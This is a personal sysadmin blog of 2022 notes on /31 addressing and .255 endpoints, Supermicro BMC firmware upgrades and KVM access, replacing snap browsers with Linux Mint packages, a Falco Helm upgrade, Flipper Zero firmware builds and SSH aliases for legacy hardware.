Notes to self, 2022

2022-10-19 - avoiding 255 / 31-bit prefixes

At OSSO, we've been using a spine-leaf architecture in the datacenter, using BGP and Layer 3 to the host. This means that we can have any IP address of ours just pop up anywhere in our network, simply by adding a prefix on a leaf switch. We sacrifice half of our IP space for this. But we gain simplicity by avoiding all Layer 2 tricks.

TL;DR: Avoid IP addresses ending in .255 for endpoints.

31-bit prefixes on Point-to-Point Links

Do we want IP 1.2.3.5 to show up somewhere? We'll just enable the 1.2.3.4/31 prefix on the relevant port on leafX. BGP announces the prefix so that both IPs become reachable via the leaf switch, and 1.2.3.5 can be reached at the selected switch port.

This makes deploying and moving services a breeze. And we don't have to deal with Layer 2 hacks. But as you can see, we have to sacrifice one IP (the switch end) per prefix.
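
For reference, deploying such a /31 looks something like this on plain Linux (a minimal sketch; the interface names are made up):

# On the leaf switch port, the even address:
ip addr add 1.2.3.4/31 dev swp1
# On the host, the odd address, with the switch end as gateway:
ip addr add 1.2.3.5/31 dev eth0
ip route add default via 1.2.3.4 dev eth0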

Normally, networks have to contain a network address (x.x.x.0 for a class C network) and a broadcast address (x.x.x.255). Thus, the smallest usable network needs two host bits, i.e. a /30, e.g. 1.2.3.0/30:

IP       what
1.2.3.0  network address
1.2.3.1  usable IP
1.2.3.2  usable IP
1.2.3.3  broadcast address

The network address is obsolete and never used. And the broadcast address equates to “the other host”, so it is not needed for networks with only two parties. Therefore RFC 3021 specifies that for such small networks, we only need two addresses: a /31.

Wasting 75% of our address space would've been awful, but wasting 50% is a good trade-off for what we gain.

The problem with Windows

Microsoft unfortunately did not read RFC 3021, so for those hosts we're stuck wasting two additional IP addresses. I've seen reports that one could use a /32 on the Windows side and that it will effectively work as if it were a /31, but we have not verified this.

The problem with some routers

Recently we ran into an issue where someone could connect to a service from work, but not from home. Investigation revealed that the problem arose because the endpoint was on an IP address that ends in .255.

Following the setup above, we can hand out all 128 prefixes from 1.2.3.0/31 up to 1.2.3.254/31. By convention we assigned the even IP — here 1.2.3.254 — to the switch: this meant that the endpoint/service got address 1.2.3.255.

This had been running fine for years, until now.

The user with issues was using the KPN network (86.90.0.0/16), with an Experia box V8 (Arcadyan, Astoria Networks VGV7519), S/N A30401xxxx, MAC 84:9C:A6:xx:xx:xx. Apparently that device treats addresses that end in .255 specially, and drops packets headed in that direction.

We tested this with two different public IP addresses that ended in .255. Neither IP would receive UDP or ICMP from this NAT-router. Traffic to neighbouring IPs had no issues. Maybe this is some overeager Smurf Attack protection?

(Here's a note to KPN: please fix your firmware!)

Avoid using 255 for endpoints

Moral of the story: we'll keep the convention of assigning the odd address to the endpoint, except for the .255 address, which we'll assign to the switch instead (see the sketch below). This should avoid problems with crappy routers in the future. We know the real network hardware beyond that can cope.
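
A sketch of that assignment convention, with pick_31 as a hypothetical helper (assuming a 1.2.3.0/24 pool):

# Prints switch/endpoint assignment for the /31 starting at the given
# (even) last octet; swaps the pair when .255 is involved.
pick_31() {
    local even=$1 odd=$(($1 + 1))
    if [ $odd -eq 255 ]; then
        echo "switch=1.2.3.$odd endpoint=1.2.3.$even"
    else
        echo "switch=1.2.3.$even endpoint=1.2.3.$odd"
    fi
}
pick_31 4    # -> switch=1.2.3.4 endpoint=1.2.3.5
pick_31 254  # -> switch=1.2.3.255 endpoint=1.2.3.254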

2022-09-09 - supermicro / x9drw / quest for kvm

I'm connected to an “ancient” Supermicro machine — by today's standards — that saw the light of day somewhere around 2013. I'm looking for a way to access the KVM module (Keyboard, Video, Mouse) so I can update it safely. You know, to be able to fix boot issues if they arise. Unfortunately, the firmware is rather old and I cannot get the iKVM application to run like I'm used to.

Using ipmikvm

Normally, for these Supermicro servers, I use the ipmikvm wrapper. It's a script that (a) logs into the web interface, (b) downloads launch.jnlp, (c) parses it and fetches the prerequisite jar files and lastly (d) fires up Java to start the iKVM application.

You type this:

$ ipmikvm -u $USER -p $PASS $IP

The script then fires up the appropriate Java application for that particular host, generally a particular generation of the iKVM application that comes with the firmware.

For this oldie from 2013 however, that did not work:

  • The web interface is different, and ipmikvm cannot find launch.jnlp;
  • downloading launch.jnlp manually is troublesome, because the web server writes invalid Content-Length headers;
  • running the provided JViewer did not appear to work: the user interface started, but showed “0 fps” in the title bar and no video was shown.

We can go into the browser network inspector and use Copy as cURL to download the launch properties file:

curl -vv 'http://IP/Java/jviewer.jnlp?EXTRNIP=IP&JNLPSTR=JViewer' \
  -H $'Cookie: test=1; ...' \
  -H 'Referer: http://IP/page/jviewer_launch.html?JNLPSTR=JViewer&JNLPNAME=/Java/jviewer.jnlp' \
  --compressed \
  --insecure \
  >launch.jnlp

...

< HTTP/1.0 200 OK
< Server: GoAhead-Webs
< Expires: 0
< Content-length: 4134
< Content-type: application/x-java-jnlp-file
< Set-Cookie: test=1;path=/
< 
{ [1216 bytes data]
* transfer closed with 1070 bytes remaining to read
* Closing connection 0
curl: (18) transfer closed with 1070 bytes remaining to read

A valid launch.jnlp XML file of 3065 bytes is fetched, even though the server promised me 4134 bytes. An annoying bug, because newer browsers will refuse to store this file.
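
If you want to avoid the curl error altogether, the --ignore-content-length option disables the Content-Length check, so the transfer ends cleanly at connection close (untested against this particular GoAhead server):

# Same invocation as above, plus:
curl --ignore-content-length ... >launch.jnlp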

Does it run?

Yes! But only after fixing ipmikvm so it also downloads and unzips Linux_x86_64.jar for old JViewer:

$ ipmikvm ./launch.jnlp 
...
+ exec java -Djava.library.path=/home/walter/.local/lib/ipmikvm/JViewer/release \
  -cp /home/walter/.local/lib/ipmikvm/JViewer/release/JViewer.jar \
  com.ami.kvm.jviewer.JViewer -apptype JViewer -hostname IP \
  -kvmtoken gWQwGxvrstzd -kvmsecure 0 -kvmport 7578 -vmsecure 0 \
  -cdstate 1 -fdstate 1 -hdstate 1 -cdport 5120 -fdport 5122 \
  -hdport 5123 -cdnum 1 -fdnum 1 -hdnum 1 -userpriv 255 -lang EN \
  -webcookie 76741dOicDdU4NSgnzyIIVTv

Access to libjava*.so was needed for the application to work properly.

Upgrading firmware to SMM_X9_2_35

Before I found and fixed the ipmikvm problem, I tried to tackle this by upgrading the firmware. That seemed like the best way forward but boy, was I wrong.

To find the right firmware, one needs to know the board version:

# journalctl -b0 -ocat --grep DMI:
DMI: Supermicro X9DRW/X9DRW, BIOS 3.0a 08/08/2013
# ipmitool mc info
Device ID                 : 32
Device Revision           : 1
Firmware Revision         : 2.19
IPMI Version              : 2.0
Manufacturer ID           : 10876
Manufacturer Name         : Supermicro
Product ID                : 43707 (0xaabb)
Product Name              : Unknown (0xAABB)
Device Available          : yes
Provides Device SDRs      : no

(There is also dmidecode, but it tells us nothing more than we already know.)

So, it's a Supermicro X9DRW with BMC Firmware version 2.19 installed. Unfortunately, finding and installing appropriate firmware is easier said than done.

WARNING/CAVEATS: Before you go any further: if you're doing this on a remote machine, make sure you have /dev/ipmi0 access to it, so you can reconfigure the LAN address and/or authentication after resetting/flashing the firmware.

On the web interface of this BMC, there was a BMC Firmware Update button, but nowhere to upload any firmware. Pressing the update button made it go into “update mode”, but that did nothing more than stall the BMC for at least 15 minutes.

Attempts to access the web interface during that time showed:

Access Error: Target device firmware is
being upgraded and not currently available.
Please try again after update completes.

Card in flash mode !

Luckily, it snapped out of that after a while (15 minutes?). Another thing to keep in mind: every time the BMC does a cold reset, it takes about 85 seconds for it to come back.
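
Since you'll be waiting on the BMC a lot, a polling loop helps (a sketch, assuming IPMI-over-LAN credentials in $IP/$USER/$PASS):

# Poll until the BMC answers IPMI requests again:
until ipmitool -I lanplus -H "$IP" -U "$USER" -P "$PASS" mc info >/dev/null 2>&1; do
    sleep 5
done
echo 'BMC is back'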

We needed something better...

After several attempts with firmwares from Drunkencat Supermicro BIOS, I did get it to install version 2.35, like this:

$ unzip ../SMM_X9_2_35.zip
$ unzip RLinFlsh2.9.zip
$ cd Linux_x86_64/
$ LD_LIBRARY_PATH=. ./RLin64Flsh -nw -ip $IP -u $USER -p $PASS -i ../SMM_X9_2_35.ima 
./RLin64Flsh: error while loading shared libraries: libipmi.so.1: cannot open shared object file: No such file or directory

(I should write something about using confinement (firejail, docker, apparmor) when running untrusted binaries here. But that is for another day.)

$ ln -s libipmi.so.1.0 libipmi.so.1
$ LD_LIBRARY_PATH=. ./RLin64Flsh -nw -ip $IP -u $USER -p $PASS -i ../SMM_X9_2_35.ima 
-------------------------------------------------
YAFUFlash - Firmware Upgrade Utility (Version 2.9)
-------------------------------------------------
(C)Copyright 2008, American Megatrends Inc.

Creating IPMI session via network with address IP...Done
===============================================================================
                             Firmware Details 
===============================================================================
    RomImage                   ExistingImage from Flash 

    ModuleName   Description   Version     ModuleName   Description   Version
1.  boot         BootLoader    0.2         boot          BootLoader    0.1 
2.  pcie                       0.1         pcie                        0.1 
3.  conf         ConfigParams  0.1         conf          ConfigParams  0.1 
4.  bkupconf                   1.2         bkupconf                    1.2 
5.  root         Root          0.1         root          Root          0.1 
6.  osimage      Linux OS      0.6         osimage       Linux OS      0.6 
7.  www          Web Pages     0.6         www           Web Pages     0.6 
8.  rainier                    2.35         rainier                     2.19 

For Full Firmware upgrade,Please  type (0)  alone
For Module Upgrade enter the total no. of Modules to Upgrade 
Enter your choice : 1
Enter the Module Name to Update : rainier

****************************************************************************
 WARNING!
        FIRMWARE UPGRADE MUST NOT BE INTERRUPTED ONCE IT IS STARTED.
        PLEASE DO NOT USE THIS FLASH TOOL FROM THE REDIRECTION CONSOLE.
****************************************************************************
Updating the module rainier ..... Done
Resetting the firmware..........

The above output was from one of the lucky tries. During other attempts I got Error in activate flash mode or some other error. Updating firmware using RLin64Flsh turned out not to be deterministic: it failed seemingly at random.

Failing upgrades to SMT_X9_315

Trying to update to 3.15 or 3.53 did not pan out well either. The zip files contain an lUpdate tool that did not work remotely (-i lan). It did operate on /dev/ipmi0, albeit very slowly.

Using the local lUpdate started out promising, with three upload phases. However, all attempts ended in:

Please wait....If the FW update fails. PLEASE WAIT 5 MINS AND REMOVE THE AC...


Update progress:193 %

193%!? Hopeless...

Other attempts

I also tried the fwum option in ipmitool:

# ipmitool fwum info
FWUM extension Version 1.3

IPMC Info
=========
Manufacturer Id           : 10876
Board Id                  : 43707
Firmware Revision         : 2.35
FWUM Firmware Get Info returned c1

But "downloading" firmware onto the BMC only got me segmentation faults, i.e. bugs in ipmitool itself.

I've come to believe that not being able to upgrade to 3.x is probably a Renesas (X9, *.ima) versus Harmon (X9, *.bin) thing. Likely this machine has Renesas BMC hardware and will not update to any newer firmware.

After some more failed attempts at upgrading to firmware versions in the 3.x range, I did manage to update it to 2.60 through sheer luck. In the meantime, I also tried a factory reset. For that it is important that you have /dev/ipmi0 access, so you can fix the (static) IPs:

ipmitool lan set 1 ipsrc static
ipmitool lan set 1 ipaddr 1.2.3.4
ipmitool lan set 1 netmask 255.255.255.0
ipmitool lan set 1 defgw ipaddr 1.2.3.1   
ipmitool lan set 1 ipsrc static

If you forget to set it to static first, you get the following error, along with a timeout:

# ipmitool lan set 1 defgw ipaddr 1.2.3.1
Setting LAN Default Gateway IP to 1.2.3.1
LAN Parameter Data does not match!  Write may have failed.

But alas, no working JViewer after the factory reset either.

Upgrading firmware to SMM_X9_2_77

I managed to upgrade to 2.77 — the latest 2.x I could find — using SMCIPMITool, which you can fetch from the Supermicro downloads if you agree to Supermicro's terms.

File Name:SMM_X9_2_77.zip
Revision:2.77
Size(KB):20,461
This zip file contains BIOS ROM, Flash utility, and Readme
instructions. You may download the free WINZIP utility to
extract the contents of this file.
MD5:dd3c8aee63b60f3fc2485caed05f669a
SHA1:3906d2367ca22bdb54d69e8723bad34f0cd032e1
SHA256:eba03b51c5e8ebc561481cd136c305ef9495ff197b3ec56817dc3646190aef97
$ md5sum ../SMCIPMITool_2.26.0_build.220209_bundleJRE_Linux_x64.tar.gz 
6a50f5246e0e472d1c80bd1fb6378bba  SMCIPMITool_2.26.0_build.220209_bundleJRE_Linux_x64.tar.gz
$ ./SMCIPMITool $IP $USER $PASS ipmi flashr ../../2.77/SMM_X9_2_77.ima 
**************************************************************
WARNING!
Firmware upgrade must not be interrupted once it is started.
Once you get error after Upgrading, please use local KCS tool
for recovery.(DOS:RKCSFlsh.exe, Linux:RLin32Flsh or 
Windows:RWin32Flsh.exe ) 
**************************************************************
Check firmware file... Done (ver:2.77.0)
Check BMC status... Done (ver:2.60.0)
Enter to Flash Mode

Uploading >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>100% 
Upgrading >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>100% 
Verifying >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>100% 
Resetting BMC
Success
Total Elapse Time: 20 min 26 sec(s)

This felt a lot less flaky. Finally a tool that is less vague about what it's doing and whether it's doing anything at all.

Using SMCIPMITool

The mentioned SMCIPMITool appears to be better than many of the other tools out there.

$ ./SMCIPMITool $IP $USER $PASS ipmi ver
Firmware Revision  = 02.77.00
IPMI Version       = 2.0
Manufacturer ID    = 7C 2A 00 
product ID         = BB AA 00 
$ ./SMCIPMITool $IP $USER $PASS nm ver
Node Manager Version = 2.0
Firmware Version     = 2.17
$ ./SMCIPMITool $IP $USER $PASS nm20 summary
...
             Power Usage              
+------------------------------------+
|Domain                  |  Usage (W)|
+====================================+
|Entire platform         |        153|
+------------------------------------+
|CPU subsystem           |         38|
+------------------------------------+
|Memory subsystem        |          6|
+------------------------------------+

Using SMCIPMITool for KVM

In fact, you can also use SMCIPMITool for KVM purposes:

$ ./SMCIPMITool $IP $USER $PASS ukvm
Starting JViewer (X9) Process...Done
Please wait for JViewer (X9) window

This opened the JViewer application. And this was the first time I got video instead of the dreaded “0 fps”.

Under the hood, SMCIPMITool looks up which firmware it speaks to, and then invokes a bundled JViewer.jar, like this:

$ java -jar JViewerX9.jar $IP $USER $PASS

(For newer firmwares it will invoke the bundled iKVM application instead.)

So, it might be a good idea to get that SMCIPMITool_2.26.0_build.220209_bundleJRE_Linux_x64.tar.gz and its contained JViewerX9.jar today and store it somewhere safe.

2022-08-31 - chromium browser / without ubuntu snap / linux mint

In 2019, Clement "Clem" Lefebvre of Linux Mint wrote these prophetic words: “As long as snap is a solution to a problem, it’s great. Just like Flatpak, it can solve some of the real issues we have with frozen package bases. It can provide us with software we couldn’t otherwise run as packages. When it starts replacing packages for no good reason though, when it starts harming our interaction with upstream projects and software vendors and reducing our choice, it becomes a threat.”

For me, this point appears to have arrived on Ubuntu. The chromium-browser has been moved to a snap package in Ubuntu 20.04. Firefox also moved to snap in Ubuntu 22.04. Is this a problem?

Yes! It is.

Since the (silent) replacement of these packages with snap packages, I've run into:

  • Font issues that are caused by the snap confinement, but are not common enough to get properly fixed.
  • A grave drag-and-drop bug that was present in all available snaps: I had to export a snap from another machine that still had a non-broken chromium-browser. Getting an older (working) version from the snapcraft store was not supported. Instead I was told I should've made backups... of an application. (Exploding head emoji here.)
  • Forced automatic updates (with a couple of issues), that force me to restart my browser.
  • There are minor annoyances, like extra memory/disk usage, extra items in df and mount listings.
  • Failed file uploads for no good reason (non-$USER-owned files in my homedir are blacklisted) and with no visible cause. The snapcraft developers consider such use "exotic". I mean, who in their right mind has tcpdump-owned files in their homedir? /s

I think that last one, and especially the mindset of the developers — “we force people to adapt to far worse workarounds than running chown on files for much more common usecases” — is the straw that broke the camel's back.

Moving to Mint Packages

Ubuntu has served me well, both as a desktop and as a server system, for well over twelve years. Canonical did not always get everything right on the first try (upstart, anyone?), but generally stuff has worked remarkably well. For that I am grateful.

So, instead of flat out ditching Ubuntu, I shall first try whether we can just borrow packages from Linux Mint. I'm running Ubuntu/Jammy 22.04, on which Linux Mint 21 Vanessa is based. (For Focal 20.04, there is Mint 20.3 Una.)

Setting it up (as root):

echo "deb [signed-by=/etc/apt/keyrings/linuxmint.com.gpg]\
 http://packages.linuxmint.com vanessa upstream" \
  >/etc/apt/sources.list.d/linuxmint.list
mkdir -p /etc/apt/keyrings
tmp=$(mktemp -d) &&
  GNUPGHOME=$tmp gpg --keyserver keyserver.ubuntu.com \
    --recv-keys 0xA6616109451BBBF2 &&
  GNUPGHOME=$tmp gpg --export A6616109451BBBF2 \
    >/etc/apt/keyrings/linuxmint.com.gpg &&
  rm -rf $tmp
cat >/etc/apt/preferences.d/linuxmint-against-snapcraft.pref <<EOF
Package: *
Pin: origin packages.linuxmint.com
Pin-Priority: -1

# Pinning does not need to go above 1000 because we do not need to
# downgrade. Ubuntu does not ship with a chromium package.
Package: chromium
Pin: origin packages.linuxmint.com
Pin-Priority: 600

# Firefox depends on ubuntu-system-adjustments, but you can install
# https://github.com/wdoekes/nosnap-deb/releases/download/v0.1/nosnap_0.1_all.deb
# as replacement.
Package: firefox
Pin: origin packages.linuxmint.com
Pin-Priority: 1000

# Thunderbird is still shipped as a real OS-component, so this is not needed yet.
#Package: thunderbird
EOF
apt-get update && apt-get install chromium

We'll see how this pans out and if we can purge snapd with fire.

$ snap list chromium
Name      Version        Rev
chromium  104.0.5112.79  2051
$ dpkg -l | grep chromium
ii  chromium  104.0.5112.101~linuxmint1+vanessa

So far, so good...

Using packages from other Distros?

Is it a good idea to use a package from Linux Mint?

If you're aware of the pitfalls, and its dependencies don't diverge from what you already have (Mint is based on Ubuntu), you should be fine.

Additionally, I can recommend apt-find-foreign, a tool that lists the origin of packages on your Debian derivative system. A run might look like this:

$ apt-find-foreign 
Lists with corresponding package counts:
  3224  http://archive.ubuntu.com/ubuntu
  4     http://ddebs.ubuntu.com
  1     http://packages.linuxmint.com

Lists with very few packages (or with remarks):
  http://ddebs.ubuntu.com
    - libmount1-dbgsym
    - mount-dbgsym
    - openssh-client-dbgsym
    - util-linux-dbgsym
  http://packages.linuxmint.com
    - chromium

It's good practice to run this after doing package upgrades to confirm that you don't have unexpected foreign (or old) packages on your system.

Profile gone?

Yes. The new Mint Chromium does not read the profile of your Snap Chromium. If you want to keep bookmarks, current sessions, etc., you'll need to do some migrating.

This should be sufficient before your first run:

rm -rf ~/.config/chromium
cp -a ~/snap/chromium/common/chromium ~/.config/chromium

Once you're happy, you can remove the ~/snap/ stuff.
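
That could look like this (a sketch; only do this after confirming the migrated profile works):

sudo snap remove chromium
rm -rf ~/snap/chromium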

Also on Focal?

For Ubuntu/Focal you need to use una instead of vanessa in the /etc/apt/sources.list.d/linuxmint.list file.

As of this writing, there is a font/color issue with background tab text: inactive tabs have an icon but no label text. This can be fixed by going into Settings, Appearance and selecting the Classic theme, instead of GTK+.

Google as search engine?

Go to Chromium settings, Search engine, Manage, Add a new “site search”:

Search engine: Google
Shortcut:      g
URLs:          https://www.google.com/search?q=%s
(or)
URLs:          {google:baseURL}search?q=%s&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchboxStats}{google:searchFieldtrialParameter}{google:iOSSearchLanguage}{google:prefetchSource}{google:searchClient}{google:sourceId}{google:contextualSearchVersion}ie={inputEncoding}

And then click Make default from its hamburger menu.

Firefox?

The same steps as above apply. But you'll need a ubuntu-system-adjustments >= 2021.12.16 package to satisfy the dependencies of the Firefox package. You can download and install nosnap_0.1_all.deb that provides such a dependency:

wget https://github.com/wdoekes/nosnap-deb/releases/download/v0.1/nosnap_0.1_all.deb

(sha256sum 1b634ca7 a66814a0 40907c6b a726fd5a a63e1687 5a24a8ce 6b7b28d8 0d0e1e5a nosnap_0.1_all.deb)

dpkg -i nosnap_0.1_all.deb
apt-get install firefox
rm -rf ~/.mozilla
cp -a ~/snap/firefox/common/.mozilla ~/.mozilla

At this point, you may need to do some magic, because over here, I had to fiddle with profiles.ini like this:

--- .mozilla/firefox/installs.ini
+++ .mozilla/firefox/installs.ini
@@ -1,3 +1,4 @@
 [4C36D121DA48BA8E]
 Default=fvorzk4r.default-1644166646276
+Locked=1
 
--- .mozilla/firefox/profiles.ini
+++ .mozilla/firefox/profiles.ini
@@ -1,3 +1,7 @@
+[Install4C36D121DA48BA8E]
+Default=fvorzk4r.default-1644166646276
+Locked=1
+
 [Profile0]
 Name=default
 IsRelative=1

The above changes ensured that the right profile was loaded when starting Firefox.

Purging snapd?

I'll leave the purging — or at least the disabling from auto-starting while you're not using it — of snapd to another post.

Final words

I am not against Snap (or AppImage or Flatpak). They have their uses for applications that not everyone uses all the time. I've certainly used it for the Arduino IDE — until the strict confinement disallowed me from setting up the Micro:bit environment — or the Drawio app — until I ran into a version that crashed when trying to save, because of bad library dependencies inside the snap. But for standard packages that can be considered part of the OS — I'm talking about web browsers — using snap is a bridge too far. Especially if it secretly introduces confinement that you are not made aware of.

2022-08-30 - falco helm upgrade / labelselector field immutable

Today I got this unusual error when upgrading the Falco helm chart from 1.19.4 to 2.0+.

Error: UPGRADE FAILED: cannot patch "falco" with kind DaemonSet:
 DaemonSet.apps "falco" is invalid:
 spec.selector: Invalid value: v1.LabelSelector{
  MatchLabels:map[string]string{"app.kubernetes.io/instance":"falco", "app.kubernetes.io/name":"falco"},
  MatchExpressions:[]v1.LabelSelectorRequirement(nil)
 }: field is immutable

The explanation, as given by Stackoverflow user misha2048:

You cannot update selectors for [...] ReplicasSets, Deployments, DaemonSets [...] from my-app: ABC to my-app: XYZ and then simply [apply the changes].

Instead, you should kubectl delete ds falco first. In this case, because the labels changed from:

labels:
  app: falco
  app.kubernetes.io/managed-by: Helm
  chart: falco-1.19.4
  heritage: Helm
  release: falco

to:

labels:
  app.kubernetes.io/instance: falco
  app.kubernetes.io/managed-by: Helm
  app.kubernetes.io/name: falco
  app.kubernetes.io/version: 0.32.2
  helm.sh/chart: falco-2.0.16
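
So the full sequence is something like this (a sketch, assuming the chart was installed as release falco in the current namespace from a Helm repo named falcosecurity, and accepting a brief monitoring gap while the DaemonSet is gone):

kubectl delete ds falco
helm upgrade falco falcosecurity/falco --version 2.0.16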

Maybe it would've been nice if this was mentioned in the not so verbose Falco Helm changelog. Are there upgrade docs anywhere?

2022-08-11 - flipper zero multi-tool / developing

Here are some pointers on how to get started editing/developing plugins for the Flipper Zero multi-tool.

(When writing this, the stable version was at 0.63.3. Things are moving fast, so some of the next bits may be outdated when you read them.)

Starting

Starting the Flipper Zero and adding an SD-card is documented in Flipper Zero first-start.

Now you can use all the nice pentest features already included. The SD-card is necessary to unlock some features.

When you first get your hands on your Flipper, you'll likely want to play around a bit now, scanning your NFC tags and radio controls.

Firmware

To update the firmware, you'll need to download qFlipper, attach the Flipper Zero to your USB port and click the INSTALL button, as documented in Flipper Zero firmware-update. On Linux you may need to add the following to /etc/udev/rules.d/42-flipperzero.rules first (and then run udevadm control --reload-rules and udevadm trigger as root):

#Flipper Zero serial port
SUBSYSTEMS=="usb", ATTRS{idVendor}=="0483", ATTRS{idProduct}=="5740", ATTRS{manufacturer}=="Flipper Devices Inc.", TAG+="uaccess"
#Flipper Zero DFU
SUBSYSTEMS=="usb", ATTRS{idVendor}=="0483", ATTRS{idProduct}=="df11", ATTRS{manufacturer}=="STMicroelectronics", TAG+="uaccess"
#Flipper ESP32s2 BlackMagic
SUBSYSTEMS=="usb", ATTRS{idVendor}=="303a", ATTRS{idProduct}=="40??", ATTRS{manufacturer}=="Flipper Devices Inc.", TAG+="uaccess"

The usage of qFlipper should be self-explanatory.

Plugins

At this point — while writing, we're on firmware 0.63.3 — adding plugins is not trivial yet. The Flipper Zero development page is empty.

[Development, an empty page]

No, this page did not help me ;-)

Some tutorials/examples exist elsewhere, like mfulz/Flipper-Plugin-Tutorial. A good alternative is to take the existing Snake game and remove all the code until you're left with something that does little more than print Hello World.

Building

Building a plugin means building the entire firmware. The steps involved are:

git clone https://github.com/flipperdevices/flipperzero-firmware
cd flipperzero-firmware/
git submodule init
git submodule update
sudo apt-get install scons openocd clang-format-13 dfu-util protobuf-compiler  # see ReadMe.md

Check out an appropriate version:

$ git tag -l | sort -V | tail -n3
0.63.2-rc
0.63.3
0.63.3-rc
$ git checkout -b branch-0.63.3 0.63.3
$ ./fbt

This yields a nice ./build/latest/firmware.dfu which can be uploaded using qFlipper.

If you want your (modified) version recorded in the About screen, you'll need to tag it. If git describe --exact-match returns no match, then the version shown will be "unknown". The git commit id is always shown regardless.
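
So, to get a version into the About screen, tag your build before compiling (the tag name here is of your own choosing):

git tag 0.63.3-mybuild1
./fbt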

I plan to follow up on this post with some documentation on using the GPIO ports and connecting a temperature sensor. To be continued...

P.S. If you've managed to freeze your Flipper, have no fear. The LEFT+BACK button combination makes it reset. Or, alternatively, hold BACK for 30+ seconds.

Update 2022-09-02

In the meantime, I did get some fixes in:

Changes so I can attach a temperature sensor and read it are still pending:

[Flipper Zero with DS18B20 sensor attached to GPIO pin C0, reading 23.3 degrees Celsius]

In the meantime, you can look at these repositories for more inspiration:

Getting U2F to work on Ubuntu with snap

If you're using Chromium or Firefox in snap, you may need some extra udev rules too:

--- 70-snap.chromium.rules  2022-08-12 18:07:02.865910207 +0200
+++ 70-snap.chromium.rules  2022-08-12 18:07:43.297930862 +0200
@@ -107,6 +107,8 @@ SUBSYSTEM=="hidraw", KERNEL=="hidraw*",
 # u2f-devices
 # Yubico YubiKey
 SUBSYSTEM=="hidraw", KERNEL=="hidraw*", ATTRS{idVendor}=="1050", ATTRS{idProduct}=="0113|0114|0115|0116|0120|0121|0200|0402|0403|0406|0407|0410", TAG+="snap_chromium_chromedriver"
+# Flipper Zero
+SUBSYSTEM=="hidraw", KERNEL=="hidraw*", ATTRS{idVendor}=="0483", ATTRS{idProduct}=="5741", TAG+="snap_chromium_chromedriver"
 TAG=="snap_chromium_chromedriver", RUN+="/usr/lib/snapd/snap-device-helper $env{ACTION} snap_chromium_chromedriver $devpath $major:$minor"
 # bluez
 KERNEL=="rfkill", TAG+="snap_chromium_chromium"
@@ -216,4 +218,6 @@ SUBSYSTEM=="hidraw", KERNEL=="hidraw*",
 # u2f-devices
 # Yubico YubiKey
 SUBSYSTEM=="hidraw", KERNEL=="hidraw*", ATTRS{idVendor}=="1050", ATTRS{idProduct}=="0113|0114|0115|0116|0120|0121|0200|0402|0403|0406|0407|0410", TAG+="snap_chromium_chromium"
+# Flipper Zero
+SUBSYSTEM=="hidraw", KERNEL=="hidraw*", ATTRS{idVendor}=="0483", ATTRS{idProduct}=="5741", TAG+="snap_chromium_chromium"
 TAG=="snap_chromium_chromium", RUN+="/usr/lib/snapd/snap-device-helper $env{ACTION} snap_chromium_chromium $devpath $major:$minor"
--- 70-snap.firefox.rules  2022-08-12 18:06:09.309883567 +0200
+++ 70-snap.firefox.rules  2022-08-12 18:06:33.853895670 +0200
@@ -105,6 +105,8 @@ SUBSYSTEM=="hidraw", KERNEL=="hidraw*",
 # u2f-devices
 # Yubico YubiKey
 SUBSYSTEM=="hidraw", KERNEL=="hidraw*", ATTRS{idVendor}=="1050", ATTRS{idProduct}=="0113|0114|0115|0116|0120|0121|0200|0402|0403|0406|0407|0410", TAG+="snap_firefox_firefox"
+# Flipper Zero
+SUBSYSTEM=="hidraw", KERNEL=="hidraw*", ATTRS{idVendor}=="0483", ATTRS{idProduct}=="5741", TAG+="snap_firefox_firefox"
 TAG=="snap_firefox_firefox", RUN+="/usr/lib/snapd/snap-device-helper $env{ACTION} snap_firefox_firefox $devpath $major:$minor"
 # camera
 KERNEL=="vchiq", TAG+="snap_firefox_geckodriver"
@@ -212,4 +214,6 @@ SUBSYSTEM=="hidraw", KERNEL=="hidraw*",
 # u2f-devices
 # Yubico YubiKey
 SUBSYSTEM=="hidraw", KERNEL=="hidraw*", ATTRS{idVendor}=="1050", ATTRS{idProduct}=="0113|0114|0115|0116|0120|0121|0200|0402|0403|0406|0407|0410", TAG+="snap_firefox_geckodriver"
+# Flipper Zero
+SUBSYSTEM=="hidraw", KERNEL=="hidraw*", ATTRS{idVendor}=="0483", ATTRS{idProduct}=="5741", TAG+="snap_firefox_geckodriver"
 TAG=="snap_firefox_geckodriver", RUN+="/usr/lib/snapd/snap-device-helper $env{ACTION} snap_firefox_geckodriver $devpath $major:$minor"

Reloading udev: udevadm control --reload-rules && udevadm trigger

2022-07-12 - ubuntu jammy / ssh / rsa keys

With the new Ubuntu/Jammy we also get tighter security settings. Here are some aliases that will let you connect to older ssh servers.

For access to old Cisco routers, we already had the first two options in this alias; we now add two more:

# Alias on Ubuntu/Jammy with ssh 8.9p1-3+ to access old routers/switches:
alias ssholdhw="ssh \
    -oKexAlgorithms=+diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 \
    -oCiphers=+aes128-cbc,aes192-cbc,aes256-cbc,3des-cbc \
    -oHostkeyAlgorithms=+ssh-rsa \
    -oPubkeyAcceptedKeyTypes=+ssh-rsa"

That lets us connect to old Cisco and old HP equipment.

When connecting to slightly less old hardware — Cumulus Linux 3.7 — we notice we'll also need some tweaks:

$ ssh 10.1.2.3
walter@10.1.2.3: Permission denied (publickey).

What? Is my RSA key revoked?

$ ssh 10.1.2.3 -v
...
debug1: Offering public key: /home/walter/.ssh/id_ed25519 ED25519 SHA256:3A..
debug1: Authentications that can continue: publickey
debug1: Offering public key: cardno:00xx RSA SHA256:xC..
debug1: send_pubkey_test: no mutual signature algorithm
debug1: Offering public key: /home/walter/.ssh/id_rsa RSA SHA256:ph..
debug1: send_pubkey_test: no mutual signature algorithm
...
walter@10.1.2.3: Permission denied (publickey).

Okay, not revoked, but no mutual signature algorithm. That is fixable:

# Alias on Ubuntu/Jammy with ssh 8.9p1-3+ to access OpenSSH 6.7:
alias sshold="ssh -oPubkeyAcceptedKeyTypes=+ssh-rsa"
$ sshold 10.1.2.3
Welcome to Cumulus (R) Linux (R)

Better.
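
Instead of an alias, the same can be scoped per host in ~/.ssh/config (a sketch, with a made-up address range):

cat >>~/.ssh/config <<EOF
Host 10.1.2.*
    PubkeyAcceptedKeyTypes +ssh-rsa
EOF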

Update 2023-03-29

